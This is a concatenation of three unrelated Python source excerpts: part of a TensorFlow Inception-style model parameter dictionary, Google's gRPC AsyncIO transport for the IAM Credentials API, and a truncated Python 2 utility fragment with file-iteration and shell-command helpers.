tf.Variable(tf.truncated_normal(shape=[3, 3, 96, 208], stddev=1e-4, dtype=tf.float32)),
'patch2_conv2_strides': 1,
'patch2_conv2_biases': tf.Variable(tf.constant(0.0, shape=[208], dtype=tf.float32)),
'patch2_conv2_name': 'inception3_patch2_conv2', 'patch2_conv2_padding': 'SAME',
'patch3_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 480, 16], stddev=1e-4, dtype=tf.float32)),
'patch3_conv1_strides': 1,
'patch3_conv1_biases': tf.Variable(tf.constant(0.0, shape=[16], dtype=tf.float32)),
'patch3_conv1_name': 'inception3_patch3_conv1', 'patch3_conv1_padding': 'SAME',
'patch3_conv2_kernel':
tf.Variable(tf.truncated_normal(shape=[5, 5, 16, 48], stddev=1e-4, dtype=tf.float32)),
'patch3_conv2_strides': 1,
'patch3_conv2_biases': tf.Variable(tf.constant(0.0, shape=[48], dtype=tf.float32)),
'patch3_conv2_name': 'inception3_patch3_conv2', 'patch3_conv2_padding': 'SAME',
'patch4_max1_kernel': 3,
'patch4_max1_strides': 1, 'patch4_max1_name': 'inception3_patch4_max1',
'patch4_max1_padding': 'SAME',
'patch4_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 480, 64], stddev=1e-4, dtype=tf.float32)),
'patch4_conv1_strides': 1,
'patch4_conv1_biases': tf.Variable(tf.constant(0.0, shape=[64], dtype=tf.float32)),
'patch4_conv1_name': 'inception3_patch4_conv2', 'patch4_conv1_padding': 'SAME'
},
'inception4_name': 'inception4',
'inception4_concat_axis': 3,
'inception4_param': {
'max1_ksize': 3, 'max1_strides': 2, 'max1_name': 'inception4_max1', 'max1_padding': 'SAME',
'patch1_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 512, 160], stddev=1e-4, dtype=tf.float32)),
'patch1_conv1_strides': 1,
'patch1_conv1_biases': tf.Variable(tf.constant(0.0, shape=[160], dtype=tf.float32)),
'patch1_conv1_name': 'inception4_patch1_conv1', 'patch1_conv1_padding': 'SAME',
'patch2_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 512, 112], stddev=1e-4, dtype=tf.float32)),
'patch2_conv1_strides': 1,
'patch2_conv1_biases': tf.Variable(tf.constant(0.0, shape=[112], dtype=tf.float32)),
'patch2_conv1_name': 'inception4_patch2_conv1', 'patch2_conv1_padding': 'SAME',
'patch2_conv2_kernel':
tf.Variable(tf.truncated_normal(shape=[3, 3, 112, 224], stddev=1e-4, dtype=tf.float32)),
'patch2_conv2_strides': 1,
'patch2_conv2_biases': tf.Variable(tf.constant(0.0, shape=[224], dtype=tf.float32)),
'patch2_conv2_name': 'inception4_patch2_conv2', 'patch2_conv2_padding': 'SAME',
'patch3_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 512, 24], stddev=1e-4, dtype=tf.float32)),
'patch3_conv1_strides': 1,
'patch3_conv1_biases': tf.Variable(tf.constant(0.0, shape=[24], dtype=tf.float32)),
'patch3_conv1_name': 'inception4_patch3_conv1', 'patch3_conv1_padding': 'SAME',
'patch3_conv2_kernel':
tf.Variable(tf.truncated_normal(shape=[5, 5, 24, 64], stddev=1e-4, dtype=tf.float32)),
'patch3_conv2_strides': 1,
'patch3_conv2_biases': tf.Variable(tf.constant(0.0, shape=[64], dtype=tf.float32)),
'patch3_conv2_name': 'inception4_patch3_conv2', 'patch3_conv2_padding': 'SAME',
'patch4_max1_kernel': 3,
'patch4_max1_strides': 1, 'patch4_max1_name': 'inception4_patch4_max1',
'patch4_max1_padding': 'SAME',
'patch4_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 512, 64], stddev=1e-4, dtype=tf.float32)),
'patch4_conv1_strides': 1,
'patch4_conv1_biases': tf.Variable(tf.constant(0.0, shape=[64], dtype=tf.float32)),
'patch4_conv1_name': 'inception4_patch4_conv2', 'patch4_conv1_padding': 'SAME',
'patch5_avage1_kernel': 5,
'patch5_avage1_strides': 3, 'patch5_avage1_name': 'inception4_patch5_avage1',
'patch5_avage1_padding': 'VALID',
'patch5_conv_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 512, 328], stddev=1e-4, dtype=tf.float32)),
'patch5_conv_strides': 1,
'patch5_conv_biases': tf.Variable(tf.constant(0.0, shape=[328], dtype=tf.float32)),
'patch5_conv_name': 'inception4_patch5_conv1', 'patch5_conv_padding': 'SAME',
'patch5_fc1_weights':
tf.Variable(tf.truncated_normal(shape=[328, 1024], stddev=1e-1, dtype=tf.float32)),
'patch5_fc1_biases': tf.Variable(tf.constant(1.0, shape=[1024], dtype=tf.float32)),
'patch5_fc1_name': 'inception4_patch5_fc1', 'patch5_fc1_relu': True,
'patch5_fc1_relu_bias': tf.Variable(tf.constant(1.0, shape=[1024], dtype=tf.float32)),
'patch5_fc2_weights':
tf.Variable(tf.truncated_normal(shape=[1024, number_classes], stddev=1e-1, dtype=tf.float32)),
'patch5_fc2_biases': tf.Variable(tf.constant(1.0, shape=[number_classes], dtype=tf.float32)),
'patch5_fc2_name': 'inception4_patch5_fc2', 'patch5_fc2_relu': True,
'patch5_fc2_relu_bias': tf.Variable(tf.constant(1.0, shape=[number_classes], dtype=tf.float32))
},
'inception5_name': 'inception5',
'inception5_concat_axis': 3,
'inception5_param': {
'max1_ksize': 3, 'max1_strides': 2, 'max1_name': 'inception5_max1', 'max1_padding': 'SAME',
'patch1_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 512, 128], stddev=1e-4, dtype=tf.float32)),
'patch1_conv1_strides': 1,
'patch1_conv1_biases': tf.Variable(tf.constant(0.0, shape=[128], dtype=tf.float32)),
'patch1_conv1_name': 'inception5_patch1_conv1', 'patch1_conv1_padding': 'SAME',
'patch2_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 512, 128], stddev=1e-4, dtype=tf.float32)),
'patch2_conv1_strides': 1,
'patch2_conv1_biases': tf.Variable(tf.constant(0.0, shape=[128], dtype=tf.float32)),
'patch2_conv1_name': 'inception5_patch2_conv1', 'patch2_conv1_padding': 'SAME',
'patch2_conv2_kernel':
tf.Variable(tf.truncated_normal(shape=[3, 3, 128, 256], stddev=1e-4, dtype=tf.float32)),
'patch2_conv2_strides': 1,
'patch2_conv2_biases': tf.Variable(tf.constant(0.0, shape=[256], dtype=tf.float32)),
'patch2_conv2_name': 'inception5_patch2_conv2', 'patch2_conv2_padding': 'SAME',
'patch3_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 512, 24], stddev=1e-4, dtype=tf.float32)),
'patch3_conv1_strides': 1,
'patch3_conv1_biases': tf.Variable(tf.constant(0.0, shape=[24], dtype=tf.float32)),
'patch3_conv1_name': 'inception5_patch3_conv1', 'patch3_conv1_padding': 'SAME',
'patch3_conv2_kernel':
tf.Variable(tf.truncated_normal(shape=[5, 5, 24, 64], stddev=1e-4, dtype=tf.float32)),
'patch3_conv2_strides': 1,
'patch3_conv2_biases': tf.Variable(tf.constant(0.0, shape=[64], dtype=tf.float32)),
'patch3_conv2_name': 'inception5_patch3_conv2', 'patch3_conv2_padding': 'SAME',
'patch4_max1_kernel': 3,
'patch4_max1_strides': 1, 'patch4_max1_name': 'inception5_patch4_max1',
'patch4_max1_padding': 'SAME',
'patch4_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 512, 64], stddev=1e-4, dtype=tf.float32)),
'patch4_conv1_strides': 1,
'patch4_conv1_biases': tf.Variable(tf.constant(0.0, shape=[64], dtype=tf.float32)),
'patch4_conv1_name': 'inception5_patch4_conv2', 'patch4_conv1_padding': 'SAME'
},
'inception6_name': 'inception6',
'inception6_concat_axis': 3,
'inception6_param': {
'max1_ksize': 3, 'max1_strides': 2, 'max1_name': 'inception6_max1', 'max1_padding': 'SAME',
'patch1_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 512, 112], stddev=1e-4, dtype=tf.float32)),
'patch1_conv1_strides': 1,
'patch1_conv1_biases': tf.Variable(tf.constant(0.0, shape=[112], dtype=tf.float32)),
'patch1_conv1_name': 'inception6_patch1_conv1', 'patch1_conv1_padding': 'SAME',
'patch2_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 512, 144], stddev=1e-4, dtype=tf.float32)),
'patch2_conv1_strides': 1,
'patch2_conv1_biases': tf.Variable(tf.constant(0.0, shape=[144], dtype=tf.float32)),
'patch2_conv1_name': 'inception6_patch2_conv1', 'patch2_conv1_padding': 'SAME',
'patch2_conv2_kernel':
tf.Variable(tf.truncated_normal(shape=[3, 3, 144, 288], stddev=1e-4, dtype=tf.float32)),
'patch2_conv2_strides': 1,
'patch2_conv2_biases': tf.Variable(tf.constant(0.0, shape=[288], dtype=tf.float32)),
'patch2_conv2_name': 'inception6_patch2_conv2', 'patch2_conv2_padding': 'SAME',
'patch3_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 512, 32], stddev=1e-4, dtype=tf.float32)),
'patch3_conv1_strides': 1,
'patch3_conv1_biases': tf.Variable(tf.constant(0.0, shape=[32], dtype=tf.float32)),
'patch3_conv1_name': 'inception6_patch3_conv1', 'patch3_conv1_padding': 'SAME',
'patch3_conv2_kernel':
tf.Variable(tf.truncated_normal(shape=[5, 5, 32, 64], stddev=1e-4, dtype=tf.float32)),
'patch3_conv2_strides': 1,
'patch3_conv2_biases': tf.Variable(tf.constant(0.0, shape=[64], dtype=tf.float32)),
'patch3_conv2_name': 'inception6_patch3_conv2', 'patch3_conv2_padding': 'SAME',
'patch4_max1_kernel': 3,
'patch4_max1_strides': 1, 'patch4_max1_name': 'inception6_patch4_max1',
'patch4_max1_padding': 'SAME',
'patch4_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 512, 64], stddev=1e-4, dtype=tf.float32)),
'patch4_conv1_strides': 1,
'patch4_conv1_biases': tf.Variable(tf.constant(0.0, shape=[64], dtype=tf.float32)),
'patch4_conv1_name': 'inception6_patch4_conv2', 'patch4_conv1_padding': 'SAME'
},
'inception7_name': 'inception7',
'inception7_concat_axis': 3,
'inception7_param': {
'max1_ksize': 3, 'max1_strides': 2, 'max1_name': 'inception7_max1', 'max1_padding': 'SAME',
'patch1_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 528, 256], stddev=1e-4, dtype=tf.float32)),
'patch1_conv1_strides': 1,
'patch1_conv1_biases': tf.Variable(tf.constant(0.0, shape=[256], dtype=tf.float32)),
'patch1_conv1_name': 'inception7_patch1_conv1', 'patch1_conv1_padding': 'SAME',
'patch2_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 528, 160], stddev=1e-4, dtype=tf.float32)),
'patch2_conv1_strides': 1,
'patch2_conv1_biases': tf.Variable(tf.constant(0.0, shape=[160], dtype=tf.float32)),
'patch2_conv1_name': 'inception7_patch2_conv1', 'patch2_conv1_padding': 'SAME',
'patch2_conv2_kernel':
tf.Variable(tf.truncated_normal(shape=[3, 3, 160, 320], stddev=1e-4, dtype=tf.float32)),
'patch2_conv2_strides': 1,
'patch2_conv2_biases': tf.Variable(tf.constant(0.0, shape=[320], dtype=tf.float32)),
'patch2_conv2_name': 'inception7_patch2_conv2', 'patch2_conv2_padding': 'SAME',
'patch3_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 528, 32], stddev=1e-4, dtype=tf.float32)),
'patch3_conv1_strides': 1,
'patch3_conv1_biases': tf.Variable(tf.constant(0.0, shape=[32], dtype=tf.float32)),
'patch3_conv1_name': 'inception7_patch3_conv1', 'patch3_conv1_padding': 'SAME',
'patch3_conv2_kernel':
tf.Variable(tf.truncated_normal(shape=[5, 5, 32, 128], stddev=1e-4, dtype=tf.float32)),
'patch3_conv2_strides': 1,
'patch3_conv2_biases': tf.Variable(tf.constant(0.0, shape=[128], dtype=tf.float32)),
'patch3_conv2_name': 'inception7_patch3_conv2', 'patch3_conv2_padding': 'SAME',
'patch4_max1_kernel': 3,
'patch4_max1_strides': 1, 'patch4_max1_name': 'inception7_patch4_max1',
'patch4_max1_padding': 'SAME',
'patch4_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 528, 128], stddev=1e-4, dtype=tf.float32)),
'patch4_conv1_strides': 1,
'patch4_conv1_biases': tf.Variable(tf.constant(0.0, shape=[128], dtype=tf.float32)),
'patch4_conv1_name': 'inception7_patch4_conv2', 'patch4_conv1_padding': 'SAME',
'patch5_avage1_kernel': 5,
'patch5_avage1_strides': 3, 'patch5_avage1_name': 'inception7_patch5_avage1',
'patch5_avage1_padding': 'VALID',
'patch5_conv_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 528, 328], stddev=1e-4, dtype=tf.float32)),
'patch5_conv_strides': 1,
'patch5_conv_biases': tf.Variable(tf.constant(0.0, shape=[328], dtype=tf.float32)),
'patch5_conv_name': 'inception7_patch5_conv1', 'patch5_conv_padding': 'SAME',
'patch5_fc1_weights':
tf.Variable(tf.truncated_normal(shape=[328, 1024], stddev=1e-1, dtype=tf.float32)),
'patch5_fc1_biases': tf.Variable(tf.constant(1.0, shape=[1024], dtype=tf.float32)),
'patch5_fc1_name': 'inception7_patch5_fc1', 'patch5_fc1_relu': True,
'patch5_fc1_relu_bias': tf.Variable(tf.constant(1.0, shape=[1024], dtype=tf.float32)),
'patch5_fc2_weights':
tf.Variable(tf.truncated_normal(shape=[1024, number_classes], stddev=1e-1, dtype=tf.float32)),
'patch5_fc2_biases': tf.Variable(tf.constant(1.0, shape=[number_classes], dtype=tf.float32)),
'patch5_fc2_name': 'inception7_patch5_fc2', 'patch5_fc2_relu': True,
'patch5_fc2_relu_bias': tf.Variable(tf.constant(1.0, shape=[number_classes], dtype=tf.float32))
},
'inception8_name': 'inception8',
'inception8_concat_axis': 3,
'inception8_param': {
'max1_ksize': 3, 'max1_strides': 2, 'max1_name': 'inception8_max1', 'max1_padding': 'SAME',
'patch1_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 832, 256], stddev=1e-4, dtype=tf.float32)),
'patch1_conv1_strides': 1,
'patch1_conv1_biases': tf.Variable(tf.constant(0.0, shape=[256], dtype=tf.float32)),
'patch1_conv1_name': 'inception8_patch1_conv1', 'patch1_conv1_padding': 'SAME',
'patch2_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 832, 160], stddev=1e-4, dtype=tf.float32)),
'patch2_conv1_strides': 1,
'patch2_conv1_biases': tf.Variable(tf.constant(0.0, shape=[160], dtype=tf.float32)),
'patch2_conv1_name': 'inception8_patch2_conv1', 'patch2_conv1_padding': 'SAME',
'patch2_conv2_kernel':
tf.Variable(tf.truncated_normal(shape=[3, 3, 160, 320], stddev=1e-4, dtype=tf.float32)),
'patch2_conv2_strides': 1,
'patch2_conv2_biases': tf.Variable(tf.constant(0.0, shape=[320], dtype=tf.float32)),
'patch2_conv2_name': 'inception8_patch2_conv2', 'patch2_conv2_padding': 'SAME',
'patch3_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 832, 32], stddev=1e-4, dtype=tf.float32)),
'patch3_conv1_strides': 1,
'patch3_conv1_biases': tf.Variable(tf.constant(0.0, shape=[32], dtype=tf.float32)),
'patch3_conv1_name': 'inception8_patch3_conv1', 'patch3_conv1_padding': 'SAME',
'patch3_conv2_kernel':
tf.Variable(tf.truncated_normal(shape=[5, 5, 32, 128], stddev=1e-4, dtype=tf.float32)),
'patch3_conv2_strides': 1,
'patch3_conv2_biases': tf.Variable(tf.constant(0.0, shape=[128], dtype=tf.float32)),
'patch3_conv2_name': 'inception8_patch3_conv2', 'patch3_conv2_padding': 'SAME',
'patch4_max1_kernel': 3,
'patch4_max1_strides': 1, 'patch4_max1_name': 'inception8_patch4_max1',
'patch4_max1_padding': 'SAME',
'patch4_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 832, 128], stddev=1e-4, dtype=tf.float32)),
'patch4_conv1_strides': 1,
'patch4_conv1_biases': tf.Variable(tf.constant(0.0, shape=[128], dtype=tf.float32)),
'patch4_conv1_name': 'inception8_patch4_conv2', 'patch4_conv1_padding': 'SAME'
},
'inception9_name': 'inception9',
'inception9_concat_axis': 3,
'inception9_param': {
'max1_ksize': 3, 'max1_strides': 2, 'max1_name': 'inception9_max1', 'max1_padding': 'SAME',
'patch1_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 832, 384], stddev=1e-4, dtype=tf.float32)),
'patch1_conv1_strides': 1,
'patch1_conv1_biases': tf.Variable(tf.constant(0.0, shape=[384], dtype=tf.float32)),
'patch1_conv1_name': 'inception9_patch1_conv1', 'patch1_conv1_padding': 'SAME',
'patch2_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 832, 192], stddev=1e-4, dtype=tf.float32)),
'patch2_conv1_strides': 1,
'patch2_conv1_biases': tf.Variable(tf.constant(0.0, shape=[192], dtype=tf.float32)),
'patch2_conv1_name': 'inception9_patch2_conv1', 'patch2_conv1_padding': 'SAME',
'patch2_conv2_kernel':
tf.Variable(tf.truncated_normal(shape=[3, 3, 192, 384], stddev=1e-4, dtype=tf.float32)),
'patch2_conv2_strides': 1,
'patch2_conv2_biases': tf.Variable(tf.constant(0.0, shape=[384], dtype=tf.float32)),
'patch2_conv2_name': 'inception9_patch2_conv2', 'patch2_conv2_padding': 'SAME',
'patch3_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 832, 48], stddev=1e-4, dtype=tf.float32)),
'patch3_conv1_strides': 1,
'patch3_conv1_biases': tf.Variable(tf.constant(0.0, shape=[48], dtype=tf.float32)),
'patch3_conv1_name': 'inception9_patch3_conv1', 'patch3_conv1_padding': 'SAME',
'patch3_conv2_kernel':
tf.Variable(tf.truncated_normal(shape=[5, 5, 48, 128], stddev=1e-4, dtype=tf.float32)),
'patch3_conv2_strides': 1,
'patch3_conv2_biases': tf.Variable(tf.constant(0.0, shape=[128], dtype=tf.float32)),
'patch3_conv2_name': 'inception9_patch3_conv2', 'patch3_conv2_padding': 'SAME',
'patch4_max1_kernel': 3,
'patch4_max1_strides': 1, 'patch4_max1_name': 'inception9_patch4_max1',
'patch4_max1_padding': 'SAME',
'patch4_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 832, 128], stddev=1e-4, dtype=tf.float32)),
'patch4_conv1_strides': 1,
'patch4_conv1_biases': tf.Variable(tf.constant(0.0, shape=[128], dtype=tf.float32)),
'patch4_conv1_name': 'inception9_patch4_conv2', 'patch4_conv1_padding': 'SAME'
},
'avage1_ksize': 7, 'avage1_strides': 1, 'avage1_name': 'avage1', 'avage1_padding': 'SAME',
'fc1_weights': tf.Variable(tf.truncated_normal(shape=[1024, number_classes], stddev=1e-1, dtype=tf.float32)),
'fc1_biases': tf.Variable(tf.constant(1.0, shape=[number_classes], dtype=tf.float32)),
'fc1_name': 'fc1', 'fc1_relu': True,
'fc1_relu_bias': tf.Variable(tf.constant(1.0, shape=[number_classes], dtype=tf.float32))
}
return model_param
|
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Awaitable, Callable, Dict, Optional, Sequence, Tuple, Union
from google.api_core import gapic_v1
from google.api_core import grpc_helpers_async
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import grpc # type: ignore
from grpc.experimental import aio # type: ignore
from google.iam.credentials_v1.types import common
from .base import IAMCredentialsTransport, DEFAULT_CLIENT_INFO
from .grpc import IAMCredentialsGrpcTransport
class IAMCredentialsGrpcAsyncIOTransport(IAMCredentialsTransport):
"""gRPC AsyncIO backend transport for IAMCredentials.
A service account is a special type of Google account that
belongs to your application or a virtual machine (VM), instead
of to an individual end user. Your application assumes the
identity of the service account to call Google APIs, so that the
users aren't directly involved.
Service account credentials are used to temporarily assume the
identity of the service account. Supported credential types
include OAuth 2.0 access tokens, OpenID Connect ID tokens,
self-signed JSON Web Tokens (JWTs), and more.
This class defines the same methods as the primary client, so the
primary client can load the underlying transport implementation
and call it.
It sends protocol buffers over the wire using gRPC (which is built on
top of HTTP/2); the ``grpcio`` package must be installed.
"""
_grpc_channel: aio.Channel
_stubs: Dict[str, Callable] = {}
@classmethod
def create_channel(cls,
host: str = 'iamcredentials.googleapis.com',
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
**kwargs) -> aio.Channel:
"""Create and return a gRPC AsyncIO channel object.
Args:
host (Optional[str]): The host for the channel to use.
credentials (Optional[~.Credentials]): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
kwargs (Optional[dict]): Keyword arguments, which are passed to the
channel creation.
Returns:
aio.Channel: A gRPC AsyncIO channel object.
"""
return grpc_helpers_async.create_channel(
host,
credentials=credentials,
credentials_file=credentials_file,
quota_project_id=quota_project_id,
default_scopes=cls.AUTH_SCOPES,
scopes=scopes,
default_host=cls.DEFAULT_HOST,
**kwargs
)
def __init__(self, *,
host: str = 'iamcredentials.googleapis.com',
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
channel: aio.Channel = None,
api_mtls_endpoint: str = None,
client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
ssl_channel_credentials: grpc.ChannelCredentials = None,
client_cert_source_for_mtls: Callable[[], Tuple[bytes, bytes]] = None,
quota_project_id=None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is ignored if ``channel`` is provided.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
channel (Optional[aio.Channel]): A ``Channel`` instance through
which to make calls.
api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
If provided, it overrides the ``host`` argument and tries to create
a mutual TLS channel with client SSL credentials from
``client_cert_source`` or application default SSL credentials.
client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
Deprecated. A callback to provide client SSL certificate bytes and
private key bytes, both in PEM format. It is ignored if
``api_mtls_endpoint`` is None.
ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
for the grpc channel. It is ignored if ``channel`` is provided.
client_cert_source_for_mtls (Optional[Callable[[], Tuple[bytes, bytes]]]):
A callback to provide client certificate bytes and private key bytes,
both in PEM format. It is used to configure a mutual TLS channel. It is
ignored if ``channel`` or ``ssl_channel_credentials`` is provided.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
always_use_jwt_access (Optional[bool]): Whether self signed JWT should
be used for service account credentials.
Raises:
google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport
creation failed for any reason.
google.api_core.exceptions.DuplicateCredentialArgs: If both ``credentials``
and ``credentials_file`` are passed.
"""
self._grpc_channel = None
self._ssl_channel_credentials = ssl_channel_credentials
self._stubs: Dict[str, Callable] = {}
if api_mtls_endpoint:
warnings.warn("api_mtls_endpoint is deprecated", DeprecationWarning)
if client_cert_source:
warnings.warn("client_cert_source is deprecated", DeprecationWarning)
if channel:
# Ignore credentials if a channel was passed.
credentials = False
# If a channel was explicitly provided, set it.
self._grpc_channel = channel
self._ssl_channel_credentials = None
else:
if api_mtls_endpoint:
host = api_mtls_endpoint
# Create SSL credentials with client_cert_source or application
# default SSL credentials.
if client_cert_source:
cert, key = client_cert_source()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
else:
self._ssl_channel_credentials = SslCredentials().ssl_credentials
else:
if client_cert_source_for_mtls and not ssl_channel_credentials:
cert, key = client_cert_source_for_mtls()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
# The base transport sets the host, credentials and scopes
super().__init__(
host=host,
credentials=credentials,
credentials_file=credentials_file,
scopes=scopes,
quota_project_id=quota_project_id,
client_info=client_info,
always_use_jwt_access=always_use_jwt_access,
)
if not self._grpc_channel:
self._grpc_channel = type(self).create_channel(
self._host,
# use the credentials which are saved
credentials=self._credentials,
# Set ``credentials_file`` to ``None`` here as
# the credentials that we saved earlier should be used.
credentials_file=None,
scopes=self._scopes,
ssl_credentials=self._ssl_channel_credentials,
quota_project_id=quota_project_id,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
# Wrap messages. This must be done after self._grpc_channel exists
self._prep_wrapped_messages(client_info)
@property
def grpc_channel(self) -> aio.Channel:
"""Create the channel designed to connect to this service.
This property caches on the instance; repeated calls return
the same channel.
"""
# Return the channel from cache.
return self._grpc_channel
@property
def generate_access_token(self) -> Callable[
[common.GenerateAccessTokenRequest],
Awaitable[common.GenerateAccessTokenResponse]]:
r"""Return a callable for the generate access token method over gRPC.
Generates an OAuth 2.0 access token for a service
account.
Returns:
Callable[[~.GenerateAccessTokenRequest],
Awaitable[~.GenerateAccessTokenResponse]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'generate_access_token' not in self._stubs:
self._stubs['generate_access_token'] = self.grpc_channel.unary_unary(
'/google.iam.credentials.v1.IAMCredentials/GenerateAccessToken',
request_serializer=common.GenerateAccessTokenRequest.serialize,
response_deserializer=common.GenerateAccessTokenResponse.deserialize,
)
return self._stubs['generate_access_token']
@property
def generate_id_token(self) -> Callable[
[common.GenerateIdTokenRequest],
Awaitable[common.GenerateIdTokenResponse]]:
r"""Return a callable for the generate id token method over gRPC.
Generates an OpenID Connect ID token for a service
account.
Returns:
Callable[[~.GenerateIdTokenRequest],
Awaitable[~.GenerateIdTokenResponse]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'generate_id_token' not in self._stubs:
self._stubs['generate_id_token'] = self.grpc_channel.unary_unary(
'/google.iam.credentials.v1.IAMCredentials/GenerateIdToken',
request_serializer=common.GenerateIdTokenRequest.serialize,
response_deserializer=common.GenerateIdTokenResponse.deserialize,
)
return self._stubs['generate_id_token']
@property
def sign_blob(self) -> Callable[
[common.SignBlobRequest],
Awaitable[common.SignBlobResponse]]:
r"""Return a callable for the sign blob method over gRPC.
Signs a blob using a service account's system-managed
private key.
Returns:
Callable[[~.SignBlobRequest],
Awaitable[~.SignBlobResponse]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'sign_blob' not in self._stubs:
self._stubs['sign_blob'] = self.grpc_channel.unary_unary(
'/google.iam.credentials.v1.IAMCredentials/SignBlob',
request_serializer=common.SignBlobRequest.serialize,
response_deserializer=common.SignBlobResponse.deserialize,
)
return self._stubs['sign_blob']
@property
def sign_jwt(self) -> Callable[
[common.SignJwtRequest],
Awaitable[common.SignJwtResponse]]:
r"""Return a callable for the sign jwt method over gRPC.
Signs a JWT using a service account's system-managed
private key.
Returns:
Callable[[~.SignJwtRequest],
Awaitable[~.SignJwtResponse]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'sign_jwt' not in self._stubs:
self._stubs['sign_jwt'] = self.grpc_channel.unary_unary(
'/google.iam.credentials.v1.IAMCredentials/SignJwt',
request_serializer=common.SignJwtRequest.serialize,
response_deserializer=common.SignJwtResponse.deserialize,
)
return self._stubs['sign_jwt']
def close(self):
return self.grpc_channel.close()
__all__ = (
'IAMCredentialsGrpcAsyncIOTransport',
)
|
|
class file_iter:
def __init__(self,name):
self.name = name
self.suffix = 1
self.file = self.name + str(self.suffix)
def next(self):
self.suffix += 1
self.file = self.name + str(self.suffix)
return self.file
def __iter__(self):
self.file = self.name + str(self.suffix)
def match_list(line,dict_list):
dict = {}
res = re.split('\s+',line)
if res[0] == '':
res = res[1:]
#print res, dict_list
#print len(res), len(dict_list)
for i in range(len(dict_list)):
#print dict_list[i], res[i]
dict[dict_list[i]] = res[i]
return dict
def run(command,to_delete=[]):
import os
for file in to_delete:
os.system('rm ' + file)
print command
#raw_input()
os.system(command)
def special_objects():
